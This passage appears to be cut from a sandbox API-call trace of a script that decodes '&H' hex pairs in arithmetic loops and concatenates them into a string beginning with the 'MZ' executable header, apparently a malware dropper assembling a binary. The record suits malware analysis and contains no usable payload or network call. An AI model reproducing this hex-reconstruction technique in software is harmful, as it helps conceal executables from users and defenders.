pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.149] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.149] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.149] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.149] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.149] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.150] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.150] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.150] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.150] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.150] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.150] VarBstrCat (in: bstrLeft="000", bstrRight="E1F", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.150] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.150] VarBstrCat (in: bstrLeft="&H", bstrRight="0E", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.150] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.150] VarBstrCat (in: bstrLeft="&H", bstrRight="1F", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.150] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.150] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.150] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.150] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.151] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.151] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.151] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.151] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.151] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.151] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.151] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.151] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.151] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.152] VarBstrCat (in: bstrLeft="", bstrRight="BA0E00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.152] VarBstrCat (in: bstrLeft="&H", bstrRight="BA", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.152] VarBstrCat (in: bstrLeft="&H", bstrRight="0E", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.152] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.152] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="º\x0e", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.152] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.152] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.152] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.152] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.152] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.153] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.153] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.153] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.153] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.153] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.153] VarBstrCat (in: bstrLeft="", bstrRight="B409CD", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.153] VarBstrCat (in: bstrLeft="&H", bstrRight="B4", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.153] VarBstrCat (in: bstrLeft="&H", bstrRight="09", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.153] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.154] VarBstrCat (in: bstrLeft="&H", bstrRight="CD", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.154] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="´\x09Í", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.154] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.154] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.154] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.154] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.154] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.155] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.155] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.155] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.155] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.155] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.155] VarBstrCat (in: bstrLeft="", bstrRight="21B801", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.155] VarBstrCat (in: bstrLeft="&H", bstrRight="21", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.155] VarBstrCat (in: bstrLeft="&H", bstrRight="B8", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.155] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.155] VarBstrCat (in: bstrLeft="&H", bstrRight="01", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.156] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.156] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.156] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.156] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.156] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.156] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.156] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.156] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.156] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.156] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.156] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.157] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.157] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.157] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.157] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.157] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.157] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.157] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.158] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.158] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.158] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.158] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.158] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.158] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.158] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.159] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.159] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.159] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.159] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.159] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.159] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.159] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.159] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.159] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.159] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.159] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.160] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.160] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.160] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.160] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.160] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.160] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.160] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.160] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.160] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.160] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.160] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, 